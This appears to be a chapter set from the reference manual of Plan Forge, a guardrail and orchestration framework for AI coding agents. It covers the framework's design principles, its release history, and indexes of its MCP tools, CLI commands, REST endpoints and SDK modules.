Open source. MIT license. Audit the code. Plan Forge is dogfooded against itself, every release ships through the same Plan Forge pipeline that customers use. Self-repair tooling (forge_meta_bug_file) gives agents a way to file defects against Plan Forge during execution.

Seven principles behind Plan Forge's architecture, what each one prevents, where it is enforced.
When to read this chapter: reviewing why Plan Forge enforces what it enforces, onboarding to the architecture, or evaluating whether a proposed change conflicts with a foundational principle.
Reference adaptation of the marketing essay I Built Guardrails for AI Coding Agents — Here's What I Learned (April 2026). The blog tells the story; this chapter captures the principles.
Principle: Define what should not be built, not just what should. Explicit prohibitions cut scope drift by, to quote the source, "an order of magnitude" (guardrails-lessons-learned blog).
Failure mode it addresses: An agent asked to "build a login page" produces a login page plus a password reset flow, an admin panel, a user profile system, and refactored database migrations. The agent is not being creative, it is being thorough with zero scope constraints.
Where it is enforced: Every hardened plan ships a Forbidden Actions section in the Scope Contract. The PreToolUse lifecycle hook (see How It Works → Building Blocks) blocks file edits to paths listed in the active plan's Forbidden Actions. The pattern is enforced by the plan-hardening prompt, not left to the executing agent's discretion.
"The most powerful guardrail isn't 'do this.' It's 'don't do that.'"
Principle: Guardrails that require manual activation are guardrails that go unused. File-pattern-scoped auto-loading drives compliance from optional to default.
Failure mode it addresses: Early Plan Forge required developers to manually attach instruction files to each chat session. Adoption sat at roughly 20%, "whoever remembered." After the breakthrough of applyTo frontmatter, adoption climbed to 100% because activation became automatic on file edits.
Where it is enforced: Each instruction file in .github/instructions/ declares which file patterns it cares about via YAML frontmatter:
---
description: Security guardrails for auth and middleware
applyTo: '**/auth/**,**/middleware/**'
---
When a file matching the pattern is edited, the instruction file loads automatically into the agent's context. See Customization → Custom Instructions for the full pattern reference.
Principle: The session that wrote the code cannot evaluate it objectively. Sunk-cost bias is a property of the context window, not the model. A fresh review session catches what the build session is structurally unable to see.
Failure mode it addresses: In a single long chat session, the agent that wrote the code will always believe its code is correct. The blind spots that produced the bug live in the same token sequence as the proposed fix. Self-review fails silently, the agent gives itself a passing grade and moves on.
Where it is enforced: Plan Forge mandates session isolation. Builder works in Session 2; reviewer works in Session 3 with fresh context, the same guardrails, and independent judgment. See How It Works → Why Session Isolation Works for the deeper psychological breakdown, and How It Works → The 4-Session Model for the structural reference.
The analogy from the source essay: would a developer be allowed to merge their own PR without review? Same question, same answer for AI agents.
Principle: Testing "at the end" does not work. Failures cascade across files faster than the agent can debug them. Validation must happen at every slice boundary, the agent cannot proceed to slice N+1 until slice N passes its gate.
Failure mode it addresses: Building 15 files before running tests guarantees that failures compound. The agent burns its context window chasing regressions that span files it has long since stopped reasoning about.
Where it is enforced: Every hardened plan decomposes a feature into 3–7 execution slices, each with its own Validation Gate. The orchestrator runs the gate after each slice and refuses to advance on failure. See Writing Plans → Slicing Strategy for the slice contract and How It Works → Building Blocks for the gate enforcement model.
Slice gates produce three observable benefits:
Principle: One concern per file. Each file under ~150 lines. Auto-loaded only when relevant. Long monolithic instruction documents process worse than short focused ones, agents cherry-pick what's convenient and ignore the rest.
Failure mode it addresses: The first version of Plan Forge had a single copilot-instructions.md at roughly 2,000 lines covering security, testing, architecture, database patterns, error handling, and deployment. Key rules buried, contradictions crept in, and the agent applied rules selectively.
Where it is enforced: The .github/instructions/ directory contains 18+ focused files, each with a single concern. See Customization → Custom Instructions for the inventory.
v2.18 extension: Temper Guards and Warning Signs: Each instruction file now ends with two named sections, Temper Guards documents the specific shortcuts agents take that produce compiling but architecturally broken code (e.g. "this is just a DTO, no logic to test", "N+1 won't matter at our scale"); Warning Signs lists observable anti-patterns that reviewers can grep for. Each file teaches not just what to do but why not to skip it.
Principle: Every stack has different conventions. Guardrails that say "use PascalCase" to a Python developer get the entire system distrusted. Stack-aware presets eliminate the customization tax.
Failure mode it addresses: A stack-agnostic guardrail document either contradicts the project's conventions in places (loss of trust) or stays so generic that it fails to enforce anything specific (loss of value). The middle ground does not exist.
Where it is enforced: Nine first-party presets ship with Plan Forge, .NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC, selectable via setup.ps1 -Preset <name> at install time. Multi-preset combinations are supported (e.g. -Preset typescript,azure-iac) for full-stack projects. See Stack-Specific Notes for what each preset adjusts.
Principle: Treating quality as optional ("add tests later", "we'll refactor", "security can wait") guarantees that the optional steps never happen. Quality must be structural, the path of least resistance must produce tested, validated, architecturally compliant code.
Failure mode it addresses: Every "we'll fix it later" trains the next agent session to copy the same shortcut. The codebase accumulates technical debt that nobody is responsible for paying down.
Where it is enforced: Hardened plans include test expectations per slice. Architecture guardrails load on every file change. Security guardrails load on every auth file. Testing guardrails load on every test file. There is no "opt in to quality" path, bypassing the defaults requires actively working around them.
v2.19 extension: Exit Proof: Every skill now ends with a verifiable checklist, not "it seems right" but "paste the test output, show the migration file, prove coverage didn't drop." Evidence over assumption. See Customization → Skills for the Exit Proof contract.
"The best developer tools don't make quality easier. They make it unavoidable."
📄 Reference adaptation of guardrails-lessons-learned.html. Reference voice; first-person voice preserved only inside cited blockquotes.

Eleven inflection points from v1.0 (Summer 2025) to v3.6 (May 2026). Each one solved a specific problem the previous version exposed.
When to read this chapter: understanding why a feature exists, evaluating whether a design constraint is foundational or contingent, or onboarding to the architecture's history.
Reference adaptation of the marketing essay From Impossible to 7 Minutes — A Year of Building AI Coding Guardrails (April 2026), extended through v3.6 from the CHANGELOG.
What shipped: 18 specialized instruction files, prompt templates, and the 4-session pipeline (Specify → Plan → Execute → Review). Plan Forge at this point was "files you install", a guardrail collection that lived in the project's .github/ directory.
Inflection point: The breakthrough was not the file count. It was discovering that session isolation works, the builder cannot review its own work, but a separate session with fresh context catches blind spots reliably. This insight made consistent quality possible and became the foundation everything else built on. See How It Works → Why Session Isolation Works and Lessons Learned → Lesson 3.
What it solved: Single-session AI work had a quality ceiling, agents would believe their own bad code was correct because the bad code lived in the same context window as the proposed fix.
What shipped: DAG-based execution engine with CLI worker spawning, 17 MCP tools (forge_run_plan, forge_analyze, forge_diagnose, forge_cost_report, etc.), the pforge CLI, and the dashboard with live progress / cost aggregation / session replay.
Inflection point: Plan Forge stopped being "files you install" and became "a system that runs." The MCP server gave it a programmatic API; the dashboard gave it visibility; the orchestrator made full plan execution possible without human intervention between slices.
What it solved: Hardened plans existed in v1.0 but a human had to drive each slice. Long features required hours of supervised execution. The orchestrator removed the supervision tax for everything except gate failures.
What shipped: Multi-model consensus analysis. Three models analyze the same slice independently; a reviewer model synthesizes their findings into a unified report. See Advanced Execution → Quorum Mode for current mechanics.
Inflection point: Single-model execution was hitting its limits. Claude excelled at architecture; GPT at breadth; Grok brought a different analytical lens. Each model had blind spots, and those blind spots were consistent. Treating AI code analysis as a consensus process, the way human code review works, produced 20% more test recommendations than any single model alone (per quorum A/B test).
What it solved: Quality plateau on complex slices. One model's blind spot is another model's strength.
What shipped: Cross-platform notification fan-out, Telegram, Slack, Discord, Microsoft Teams, PagerDuty, OpenClaw, with inline approval / reject flows for events that need a human. See Remote Bridge.
Inflection point: Plan Forge runs inside the IDE, but some decisions are not IDE-shaped. A reviewer flags drift at 2 AM. A quorum tie needs a human tiebreaker. An incident fires after the laptop closes. The bridge made the forge able to reach you instead of waiting for you to come back.
What it solved: The "I missed the notification" failure mode that blocked autonomous execution overnight or away from the desk.
What shipped: Native VS Code experience, skills, agents, Plan Forge lifecycle hooks (PreDeploy, PreCommit, PreAgentHandoff, PostSlice, configured via .github/hooks/plan-forge.json), and instruction auto-loading via applyTo frontmatter. (These are not Claude Code's SessionStart / PreToolUse / PostToolUse / Stop hooks, the trigger semantics differ; see Installation for the mapping.) See Multi-Agent → Copilot.
Inflection point: Auto-loading turned guardrail adoption from optional ("whoever remembered") to default ("it just works"). The applyTo pattern moved compliance from roughly 20% to 100%. See Lessons Learned → Lesson 2.
What it solved: Manual instruction-file attachment was a dead pattern. Lifecycle hooks gave Plan Forge the ability to enforce rules at file-edit time rather than relying on the agent to remember to load them.
What shipped: Each instruction file gained two new sections, Temper Guards documenting the specific shortcuts agents take that produce compiling but architecturally broken code, and Warning Signs listing observable anti-patterns reviewers can grep for. Context Fuel instruction file taught agents to manage their own context budgets.
Inflection point: Agent-skills analysis revealed a class of failure that previous guardrails missed, the model would write code that compiled, passed tests, and looked plausible while violating an architectural principle nobody had thought to forbid explicitly. Temper Guards captured these as named anti-patterns; Warning Signs gave reviewers a way to detect them.
What it solved: The "looks correct, is structurally wrong" failure mode. Compiling code is not architecturally compliant code.
What shipped: Host-aware model routing (subscription-vs-API billing surface awareness), forge_estimate_quorum tool for tool-backed cost projection across all four quorum modes, and the documented complexity scoring rubric (scoreSliceComplexity()) with seven weighted signals. See Host-Aware Routing and Estimating Quorum Cost.
Inflection point: Quorum cost was previously hand-computed by agents, and observed to overshoot reality by an order of magnitude. The estimator tool replaced chat math with measured projection. Host-aware routing fixed the silent-double-pay failure mode where gpt-* models on Claude Code or Cursor would bill the user's pay-per-token API instead of their existing subscription.
What it solved: Cost surprise. Both the quorum overhead surprise (estimator) and the host billing surprise (routing).
What shipped: Phase Lattice introduced tree-sitter-based code chunking, code-graph indexing, and the forge_lattice_* tool family (index, query, callers, blast, stat). Anvil caching for cost-effective re-indexing. Hallmark provenance tracking on every chunk. v3.5.1 added camelCase-aware relevance ranking via scoreChunk() / tokenizeForSearch().
Inflection point: Plan Forge could now reason about the user's actual codebase architecture, not just plans and instructions. Searching getUserById returns the function, its callers, and its blast radius across the repository. This made auto-generated plans architecture-aware: a slice that touches a hub function gets flagged as high-blast-radius before execution.
What it solved: Plans that looked safe in isolation but rippled unexpectedly. Pre-Lattice, the agent had to grep its way to architectural awareness slice by slice.
What shipped: Three sync surfaces, completed in three consecutive releases. pforge sync-spaces (v2.98) generates Copilot Spaces from forge plans and principles. forge_sync_memories (v2.99) writes .github/copilot-memory-hints.md from cross-tool memory. forge_sync_instructions (v3.0) generates .github/copilot-instructions.md from project profile, project principles, extra instruction files, and .forge.json config.
Inflection point: Copilot became a first-class citizen of the Plan Forge ecosystem, not just one of several agent surfaces. Every Copilot conversation now opens with project-specific guidance auto-loaded by the platform, no manual setup, no forgotten attachments. This collapsed the onboarding gap for the largest installed base of any AI coding agent.
What it solved: Copilot users were getting generic guidance because copilot-instructions.md was hand-written or absent. The sync trilogy made the file always up to date and always reflective of the actual project's profile, principles, and configuration.
What shipped: Three releases focused on multi-developer awareness. v3.2 added .forge/team-activity.jsonl (shared run log), the forge_team_activity MCP tool, and pforge team activity. v3.3 added pforge github review delegate, when a slice produces a PR, an issue assigned to @copilot is filed with a structured review checklist, and the Copilot Coding Agent posts findings back on the PR. v3.4 added the Team tab in the dashboard with per-operator cards, success rates, costs, and a conflict-risk banner.
Inflection point: Plan Forge stopped being a solo tool. Teams running parallel plan executions against the same repository could now see who was working on what, get reviewer attention from the Copilot Coding Agent without a human handoff, and detect coordination risk before two developers stepped on each other's slices.
What it solved: The "two of us hit the same file" failure mode. And the "I shipped a PR but nobody reviewed it" failure mode.
What shipped: OpenBrain, the optional cross-session semantic memory backend, was reframed from a row-5 "optional extension" to L3 memory layer with a clear on-ramp at every install touchpoint. pforge smith now always reports L3 status. setup.ps1 / setup.sh prompt for OpenBrain install at the end of the flow (auto-suppressed in CI). New pforge brain {status, hint, test, replay} subcommands. README gains a numbered Step 3 "Enable Persistent Memory" with four deploy options. The if (openBrainConfigured) gating did not change, Plan Forge still works perfectly without it. See Memory Architecture on GitHub.
Inflection point: OpenBrain hooks were already wired into 28 MCP tools, 4 search-before-acting prompts, Reflexion lessons, Auto-skills, and cross-project Federation, but every one was gated and silently no-op'd otherwise. Users who didn't know to install OpenBrain were getting Plan Forge's L1 (Hub events) plus L2 (.forge/*.jsonl durable files) memory but no persistent semantic memory across sessions. The inner loop that makes the agent improve over time was effectively dark. v3.6 made the L3 layer discoverable without changing any soft-fail behavior.
What it solved: The "Plan Forge isn't getting smarter over time" failure mode. Without L3, Reflexion lessons, Auto-skills, and postmortem learnings had nowhere durable to live across sessions.
📄 Reference adaptation of the-journey-from-impossible-to-seven-minutes.html. The original essay covered v1.0 through v2.18 (April 2026). v2.83 and the v2.95 → v3.6 May 2026 sprint were added from CHANGELOG.md as they shipped.
A–Z topic index, every concept, tool, and named section across the manual with a direct link to the page that covers it.
node docs/manual/maintain.mjs from the chapter list and curated section index in assets/manual.js. To add a new entry, add it to the relevant page and re-run the script. See also the Glossary for definitions of core terms.
Every numbered figure in the manual, in chapter order. Click a row to jump to the diagram in its original chapter.
node docs/manual/maintain.mjs from every <figure class="manual-figure"> in a numbered chapter. Figure numbers (Figure 5-1) are assigned in document order within each chapter. Sub-chapters and deep dives don't carry figure numbers; their diagrams still appear inline with captions but are not enumerated here.
One index, four surfaces. Every 104 MCP tool, every 97 CLI command, every REST endpoint domain, and every SDK export, alphabetized, grouped, and cross-linked. If you can't remember whether forge_secret_scan has a CLI wrapper, this is the page.
Plan Forge exposes its capabilities through four orthogonal transports. The same handler set backs all four, choosing one is a question of who is calling.
| Surface | Count | Auth | Best for |
|---|---|---|---|
| MCP (stdio + WebSocket) | 104 tools | Transport-bound (stdio = inherited trust; WS = bearer) | Copilot, Claude, Cursor, Codex, anything speaking MCP |
CLI (pforge) |
97 commands | Local filesystem trust + PFORGE_API_TOKEN |
Scripts, cron, humans in terminals, CI runners |
REST (/api/*) |
103 endpoints across 17+ domains | Bearer token in Authorization header |
HTTP clients, CI, dashboards, mobile, anything cross-process |
SDK (pforge-sdk) |
12 sub-paths | Bearer token via createClient |
Node.js / TypeScript callers wanting typed responses |
WebSocket events on /api/hub are the fifth, observation-only surface, see Chapter 29 — Integrating from Outside. The full payload schema for every hub event is in Appendix V — Event Catalog.
Canonical source: pforge-mcp/tools.json. The full description, input schema, error map, and example for each tool is exposed via forge_capabilities. The table below is the one-line index.
| Tool | Purpose |
|---|---|
forge_smith | Inspect the forge, env, VS Code, setup health, version currency, common problems |
forge_validate | Validate Plan Forge setup, required files, counts, unresolved placeholders |
forge_status | All phases from DEPLOYMENT-ROADMAP.md with current status |
forge_diff | Compare changes against a plan's Scope Contract, drift + forbidden edits |
forge_sweep | Completeness sweep, scan for TODO/FIXME/HACK/stub/placeholder/mock markers |
forge_audit_export | Export audit events from .forge/runs/*/events.log — ACI-paginated, filterable by date/type/run |
forge_diff_stats | Classify staged git diff changes by category (plan, test, docs, config, chore, scope) — advisory only, never blocks |
forge_github_status | Inspect the GitHub-native AI surface (instructions, agents, MCP wiring, workflows, gh CLI) |
forge_github_metrics | Live GitHub repo metrics via gh CLI, stars, PRs, issues, commit activity |
forge_delegate_review | Delegate PR review to the Copilot Coding Agent (cloud) |
forge_team_dashboard | Multi-developer coordination, per-developer cards + conflict-risk assessment |
forge_team_activity | Read recent run summaries from .forge/team-activity.jsonl |
forge_new_phase | Create a new phase plan + roadmap entry |
forge_analyze | Cross-artifact analysis, traceability, coverage, scope, validation gates |
forge_run_plan | Execute a hardened plan, spawn workers, validate at every boundary, track tokens |
forge_abort | Abort the currently running plan execution |
forge_plan_status | Status of the latest plan execution run |
forge_regression_guard | Run gate commands from plan files against the current codebase |
forge_export_plan | Convert a Copilot cloud agent session plan into a hardened Phase-X-PLAN.md |
forge_pipelines_list | List the four standing capture pipelines and report their last-write timestamps plus Anvil hit rates |
forge_cost_report | Total spend, per-model breakdown, monthly aggregation from cost-history.json |
forge_estimate_quorum | Projected plan cost under all four quorum modes (auto/power/speed/false) |
forge_estimate_slice | Projected cost for a single slice under a chosen quorum mode |
forge_quorum_analyze | Assemble a structured 3-section quorum prompt from any LiveGuard data source |
forge_doctor_quorum | Preflight viability check, probe all preset models, report availability + fallbacks |
forge_crucible_submit | Submit a raw idea, start a new smelt |
forge_crucible_ask | Advance the interview, supply an answer, get the next question |
forge_crucible_preview | Render the current draft as a Markdown plan |
forge_crucible_finalize | Atomically claim a phase number, write Phase-NN.md, stamp crucibleId: |
forge_crucible_list | List smelts (newest first), optionally filtered by status |
forge_crucible_abandon | Abandon a smelt, release any phase-number claim |
forge_crucible_import | Import a Spec Kit project, deterministic, LLM-free field mapping |
forge_crucible_status | List smelts by source and status, or inspect a single smelt |
forge_tempering_scan | Read-only scan of an existing coverage report (lcov/cobertura/jacoco/cover.out/...) |
forge_tempering_status | Latest N scan summaries, dashboard feed + forge_smith panel |
forge_tempering_run | Execution harness, runs unit/integration/UI/API scanners per stack preset |
forge_tempering_approve_baseline | Promote current screenshot to visual-diff baseline |
forge_tempering_drain | Round-loop wrapper, re-probe until convergence or max-rounds cap |
forge_triage_route | Route a tempering finding into bug / spec / classifier lane |
forge_classifier_issue | File a GitHub issue proposing a classifier rule update (closes the audit loop) |
forge_bug_register | Register a bug discovered by a tempering scanner |
forge_bug_list | List bugs with optional filters |
forge_bug_update_status | Transition status (open → in-fix → fixed) with validation |
forge_bug_validate_fix | Re-run the scanner that discovered a bug to verify the fix |
forge_memory_capture | Capture a thought, decision, or lesson into OpenBrain persistent memory |
forge_memory_report | Aggregate health of every memory surface (L2 jsonl, OpenBrain queue, search cache, orphans) |
forge_sync_memories | Generate .github/copilot-memory-hints.md from trajectories + auto-skills + brain |
forge_brain_replay | Bulk-load records into OpenBrain via capture_thought from a local source file |
forge_brain_test | Round-trip test against OpenBrain (L3 memory) — write a test thought and read it back |
forge_hallmark_show | Show Hallmark provenance records — immutable milestone stamps written at slice completions, gate passes, phase closures |
forge_hallmark_verify | Verify a Hallmark record has not drifted — re-hashes the referenced source file and compares against the stored hash |
forge_sync_instructions | Generate .github/copilot-instructions.md from profile + principles + .forge.json |
forge_lattice_index | Build/update the code-graph index, chunks tracked files, persists JSONL |
forge_lattice_stat | Bounded summary, chunk count, edge count, language dist, Anvil hit rate |
forge_lattice_query | Search chunks by name, language, kind, or file path |
forge_lattice_callers | Find all chunks that reference a given symbol |
forge_lattice_blast | BFS traversal, expand callees/callers from a seed chunk up to depth N |
forge_graph_query | Query the in-memory knowledge graph (Phase/Slice/Commit/File/Run/Bug nodes) |
forge_patterns_list | List recurring patterns detected across runs (4 detectors) |
forge_anvil_stat | Inspect the Anvil memoization cache — entries, bytes, oldest entry, per-tool hit/miss counters |
forge_anvil_clear | Delete Anvil cache entries — scope by tool name, by age (olderThanMs), or both |
forge_anvil_rebuild | Invalidate Anvil cache entries for files changed since a git commit SHA |
forge_anvil_dlq_list | List dead-letter queue entries — records of cache writes that failed and were quarantined |
forge_anvil_dlq_drain | Drain (purge) dead-letter queue entries from the Anvil memoization cache |
forge_local_search | Semantic search over local .forge/ thought stores — TF-IDF or neural embeddings backend |
forge_local_recall_status | Inspect and manage the persistent TF-IDF index cache used by forge_local_search |
forge_embedding_status | Report embedding backend status — whether @xenova/transformers (neural) or TF-IDF is active, corpus size, configured backend override |
forge_drift_report | Score codebase against architecture guardrail rules, track drift over time |
forge_health_trend | Aggregate drift, cost, incidents, model performance over configurable window |
forge_hotspot | Identify git churn hotspots, files that change most frequently |
forge_alert_triage | Rank incidents + drift violations by severity × recency |
forge_incident_capture | Capture an incident, description, severity, files, resolution time (MTTR) |
forge_deploy_journal | Record a deployment, version, deployer, notes, optional slice ref |
forge_dep_watch | Scan dependencies for known vulnerabilities (npm audit / equivalent) |
forge_secret_scan | Post-commit entropy analysis, scan git diff for likely leaked secrets |
forge_env_diff | Compare env var keys across .env files, detect missing keys |
forge_liveguard_run | Run all applicable LiveGuard checks in a single call, return unified report |
forge_diff_classify | Classify staged git diff against 6 safety categories: leaked-secret, prompt-injection, eval/exec introduction, license-incompatible paste, scope-undeclared change, and test-only change |
forge_fix_proposal | Generate 1-3 slice fix plan from drift / incident / secret / Crucible / tempering finding |
forge_runbook | Generate human-readable operational runbook from a hardened plan |
forge_diagnose | Multi-model bug investigation, dispatch to multiple models, synthesize root cause |
forge_skill_status | Recent skill execution events from the WebSocket hub history |
forge_run_skill | Execute a skill programmatically, parse SKILL.md, run with validation gates |
forge_org_rules | Consolidate .github/instructions/*.instructions.md for org-level Copilot |
forge_watch | Read-only observer that tails another project's pforge run |
forge_watch_live | Live event stream from another project's pforge run for a fixed duration |
forge_review_add | Add an item to the review queue |
forge_review_list | List review queue items with filters and pagination |
forge_review_resolve | Resolve an open review item (approve/reject/defer) |
forge_delegate_to_agent | Route a tempering bug to the appropriate agent/skill for read-only analysis |
forge_notify_send | Send a notification directly via a named adapter (bypass routing) |
forge_notify_test | Test notification adapter configuration |
forge_search | Search across runs, bugs, incidents, tempering, hub events, review queue, memories, plans |
forge_timeline | Unified chronological view across all sources with correlationId grouping |
forge_home_snapshot | Aggregated snapshot of Crucible, runs, LiveGuard, Tempering + trimmed feed |
forge_capabilities | Machine-readable API surface, tools, CLI, workflows, config, dashboard, extensions |
forge_testbed_run | Run a testbed scenario against an external testbed repository |
forge_testbed_findings | Query testbed defect-log findings |
forge_testbed_happypath | Run all happy-path testbed scenarios sequentially |
forge_ext_search | Search the Plan Forge community extension catalog |
forge_ext_info | Detailed info for a specific extension (author, version, install command) |
forge_master_ask | Ask Forge-Master to reason about workflows (read-only orchestration) |
forge_generate_image | Generate an image via xAI Grok Aurora or OpenAI DALL-E |
forge_meta_bug_file | File a self-repair meta-bug against Plan Forge itself |
forge_capabilities for the machine-readable manifest with full schemas, cost tiers, intent tags, and error maps.
pforgeCanonical source: pforge.ps1 + pforge.sh (mirror implementations). Schema doc: pforge-mcp/cli-schema.json. The full reference with arguments, flags, and examples lives in Chapter 8 — CLI Reference; this is the one-line index.
pforge smith Diagnose environment + setup health
pforge check Validate setup files
pforge validate (alias) Validate Plan Forge setup
pforge status Show phase status from roadmap
pforge sweep Scan for TODO/FIXME markers
pforge tour Guided walkthrough of installed Plan Forge files
pforge help Show help
pforge config get/set <k> [v] Read or write keys in .forge.json (atomic)
pforge update Update framework files (auto-selects source)
pforge self-update Force-pull latest GitHub release
pforge install First-time install bootstrap
pforge init Initialize a new project
pforge new-phase <name> Create a new phase plan + roadmap entry
pforge analyze Cross-artifact consistency scoring (0-100)
pforge run-plan <plan> Execute a hardened plan
pforge diff <plan> Compare changes against plan Scope Contract
pforge phase-status Update phase status in DEPLOYMENT-ROADMAP
pforge regression-guard <plan> Run validation gates from plan files
pforge plan-from-sarif <sarif> Generate a fix plan from a SARIF findings file
pforge fix-proposal <finding> Generate a 1-3 slice fix plan
pforge runbook <plan> Generate operational runbook from a plan
pforge branch <plan> Create git branch from plan's Branch Strategy
pforge commit Auto-generate conventional commit from slice goal
pforge version-bump [v] Update VERSION + package.json + badges
pforge team-dashboard Per-developer cards in the terminal
pforge team-activity Query the team-activity.jsonl ledger
pforge sync-memories Generate .github/copilot-memory-hints.md
pforge sync-instructions Generate .github/copilot-instructions.md
pforge sync-spaces Sync inter-project memory spaces
pforge github status Inspect GitHub-native AI surface
pforge github metrics Live repo metrics via gh CLI
pforge org-rules Export org-level custom instructions
pforge drift Score codebase against architecture guardrails
pforge hotspot Identify git churn hotspots
pforge health-trend Drift, cost, incidents, model perf over time
pforge digest Daily digest, yesterday's deltas + anomalies
pforge triage Triage open alerts by priority
pforge dep-watch Dependency vulnerability + freshness
pforge incident capture Record an incident
pforge deploy-log Record a deployment
pforge audit-loop Drive a single audit-loop iteration
pforge audit list/show Inspect classifier audit findings
pforge hammer-fm Run the full tempering harness (false-marker scan)
pforge testbed-happypath Run all happy-path testbed scenarios
pforge regression-guard (also a plan command) Run gates as guard
pforge mcp-call <tool> ... Invoke any MCP tool not yet wrapped by a verb
pforge drain-memory Drain OpenBrain queue via local MCP REST
pforge migrate-memory Merge legacy *-history.json into .jsonl
pforge fm-session Start a Forge-Master reasoning session
pforge fm-recall Recall a prior Forge-Master session
pforge anvil stat/purge Inspect / reset the Δ-only memoization layer
pforge lattice index/stat/... Code-graph index commands
pforge secret-scan Scan recent commits for high-entropy strings
pforge env-diff Compare .env keys across environments
pforge quorum-analyze Assemble quorum prompt from LiveGuard data
pforge hallmark verify Verify Hallmark provenance envelopes
pforge ext add/remove/... Extension management
Total: 57+ top-level CLI commands across 7 functional areas. Run pforge --help for the live listing on your installed version.
/api/*Canonical source: handlers in pforge-mcp/server.mjs + pforge-mcp/dashboard/. Full per-endpoint reference: Appendix W — REST API Reference; raw dump in docs/REST-API.md on GitHub. OpenAPI spec: GET /api/openapi.json.
116 endpoints organize into these prefixes (one-line summary each, see Appendix W for verbs, query params, request/response shapes, and error codes):
| Prefix | Endpoints | Covers |
|---|---|---|
/api/plan | ~10 | Plan execution, status, abort, runs |
/api/cost | ~6 | Cost report, estimate-quorum, estimate-slice |
/api/team | ~5 | Team dashboard, activity feed, ledger queries |
/api/copilot-instructions | 3 | Read / preview / sync the trilogy file pair |
/api/graph | ~5 | Knowledge graph query, stats, rebuild |
/api/lattice | ~5 | Code-graph index, query, callers, blast |
/api/liveguard | ~6 | Secret scan, env diff, unified run, runbooks |
/api/bugs | ~6 | Register, list, update-status, validate-fix |
/api/crucible | ~10 | Submit, ask, preview, finalize, abandon, import, list, status |
/api/tempering | ~6 | Scan, status, run, drain, approve-baseline |
/api/incident | ~4 | Capture, list, MTTR, deploy-journal |
/api/health | ~5 | Drift report, trends, hotspot, alert triage |
/api/review | 3 | Add / list / resolve review queue items |
/api/forge-master | ~4 | Read-only reasoning agent ask + session mgmt |
/api/search | ~3 | Cross-artifact search, timeline, home snapshot |
/api/notify | 2 | Send / test notification adapters |
/api/ext | ~4 | Extension search, info, install, remove |
/api/anvil | ~5 | Cache stat, clear, rebuild, DLQ list, DLQ drain |
/api/embedding | ~2 | Embedding backend status, local-recall index status |
/api/audit | 1 | Audit event export (paginated, filterable by date / type / run) |
/api/hub | 1 (WS) | WebSocket event stream, 60+ event types |
/api/openapi.json | 1 | OpenAPI 3 spec for the entire surface (codegen-ready) |
pforge-sdkTwelve sub-paths, all pure Node.js (zero runtime dependencies). Full reference: pforge-sdk/README.md on GitHub.
| Import | Key exports | Use when |
|---|---|---|
pforge-sdk |
Re-exports all sub-paths below | Single import for all SDK utilities |
pforge-sdk/tools |
tools, getTool, getToolsByRisk, getToolsByIntent |
Loading + filtering the MCP tool registry from Node.js |
pforge-sdk/hallmark |
buildProvenance, validateProvenance, mergeProvenance |
Stamping / validating Hallmark provenance envelopes |
pforge-sdk/chunker |
validateChunk, CHUNK_KINDS |
Validating Lattice code-graph chunk records |
pforge-sdk/client v0.4.0 |
PForgeClient, createClient, PForgeClientError |
Calling the Plan Forge REST API from Node.js without raw fetch |
pforge-sdk/anvil v0.5.0 |
computeAnvilKey, anvilEntryPath, anvilCacheDir, anvilStatsPath |
Computing Anvil cache keys + paths without running the server |
pforge-sdk/lattice-query v0.5.0 |
LatticeQueryBuilder, tokenizeForSearch, scoreChunk |
Building fluent Lattice queries + scoring chunks without the server |
pforge-sdk/notifications/adapter-contract v0.5.0 |
validateAdapterShape, ERR_NOT_IMPLEMENTED |
Validating a custom notification adapter shape before registering it |
pforge-sdk/run-reader v0.6.0 |
listRuns, readRunMeta, readRunSummary, readRunIndex, parseEventLine |
Offline access to .forge/runs/ artifacts — no running server required |
pforge-sdk/plan-reader v0.7.0 |
listPlans, readPlan, getPlanStatus, getPlanSlices, plansDir |
Offline access to docs/plans/ plan files — read status, slices, and frontmatter without a server |
pforge-sdk/thought-reader v0.8.0 |
readThoughts, readAllThoughts, listThoughtSources, parseThoughtLine, thoughtFilePath |
Offline access to .forge/*.jsonl thought stores — OpenBrain queue, archive, DLQ, and LiveGuard memories |
pforge-sdk/digest-reader v0.9.0 |
listDigests, readDigest, readLatestDigest, overallSeverity, getSectionsByMinSeverity, digestFilePath |
Offline access to .forge/digests/*.json daily digest files — list, read, and compute severity |
Not every capability is exposed through every surface. This matrix shows which features have CLI wrappers, REST endpoints, and SDK helpers. Use it to pick the right surface for a caller.
| Capability | MCP | CLI | REST | SDK |
|---|---|---|---|---|
Plan execution (run-plan) | ✓ | ✓ | ✓ | ✓ |
| Cost reporting + estimates | ✓ | ✓ | ✓ | ✓ |
| Copilot trilogy (memory + instructions sync) | ✓ | ✓ | ✓ | ✓ |
| Team dashboard + activity | ✓ | ✓ | ✓ | ✓ |
| Knowledge graph queries | ✓ | ✓ | ✓ | ✓ |
| Daily digest | — | ✓ | ✓ | ✓ |
| LiveGuard checks (secret/env/full) | ✓ | ✓ | ✓ | ✓ |
| Tempering (scan, run, drain) | ✓ | ✓ | ✓ | ✓ |
| Crucible smelting | ✓ | ✓ | ✓ | ✓ |
| Forge-Master (read-only reasoning) | ✓ | ✓ | ✓ | ✓ |
| Lattice code graph | ✓ | ✓ | ✓ | ✓ |
| Hallmark stamp / verify | — | ✓ | — | ✓ |
| Anvil purge / stat | — | ✓ | ✓ | ✓ |
| Bug registry CRUD | ✓ | — | ✓ | ✓ |
| WebSocket live events | — | — | ✓ | ✓ |
| Self-update / install | — | ✓ | — | — |
| Notification adapter contract validation | — | — | — | ✓ |
Offline run artifact access (run-reader) | — | — | — | ✓ |
Offline plan file access (plan-reader) | — | — | — | ✓ |
Offline thought store access (thought-reader) | — | — | — | ✓ |
Offline digest file access (digest-reader) | — | — | — | ✓ |
| Anvil cache management | ✓ | ✓ | ✓ | ✓ |
| Semantic recall / local search | ✓ | — | — | — |
| Extension marketplace | ✓ | ✓ | ✓ | — |
pforge install only makes sense as a CLI command; WebSocket live events have no CLI representation (subscribe via REST + WS).
Three short case studies from production runs, each absorbed from a contemporary blog post and condensed to the parts that survive when the version numbers change. The vignettes are arranged from the largest reframe (Vignette 1, the loop that never ends) to the most quantitative receipt (Vignette 2, the 99-vs-44 A/B test) to the most operational pattern (Vignette 3, the three-model quorum run).
Audience: Readers who want concrete worked examples before committing to the chapters. Especially useful for stakeholders evaluating Plan Forge for adoption.
How to use: Read in order, or skip to the vignette closest to your situation. Each one ends with a "Where to read more" pointer into the canonical chapter that owns the topic and a citation to the original blog post for the first-person account.
| Vignette | What it shows | Source post |
|---|---|---|
